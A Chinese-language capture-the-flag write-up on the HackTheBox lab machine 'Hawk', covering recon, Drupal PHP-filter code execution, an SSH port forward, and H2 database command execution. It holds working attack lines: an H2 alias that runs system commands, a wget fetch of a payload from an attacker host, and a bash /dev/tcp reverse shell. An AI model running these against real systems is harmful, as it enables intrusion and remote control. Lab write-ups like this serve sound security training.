HTB-靶机-Hawk

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作，显示IP地址为10.10.10.102

本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

执行命令 autorecon 10.10.10.102 -o ./Hawk-autorecon

根据扫描结果，首先匿名登录ftp服务器

将下载好的文件改名并使用base64解码得到如下文件

上面的命令通过apt-get安装下即可

上述解密出来了一个密码，跟web应用有关，访问web应用是个登录界面

这里经过尝试确认了账户和密码直接登录进去，在模块里面启用php filter功能，然后添加文本内容，基础页面进入之后写入名称和反弹shell代码，这里使用php-reverse-shell.php 通过命令 cat php-reverse-shell.php | xclip -selection clipboard复制到粘贴板上

预览即可触发反弹shell代码，触发之前本地监听端口即可

通过本地在网站根目录下遍历搜索发现如下信息：

得到密码drupal4hawk 查看本地网络连接和刚开始扫描的端口开放情况得知开放了8082端口的web应用页面，直接访问发现被限制了

通过ssh进行端口转发

ssh -L 8099:127.0.0.1:8082 daniel@10.10.10.102
本地kali执行

然后本地访问8099端口即可，这里登录的时候记得调整为root，密码就上面获取到的，进入之后先创建一个可执行命令的函数，然后写个反弹shell代码本地搭建简易web应用下载到目标靶机然后执行反弹代码进行反弹shell，具体操作如下：

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : ""; }$$;

call SHELLEXEC('wget http://10.10.14.6:8000/bmfxshell')
call SHELLEXEC('chmod +x bmfxshell')

反弹代码：bash -i >& /dev/tcp/10.10.14.6/8844 0>&1  然后开始执行

本地监听端口并获取反弹shell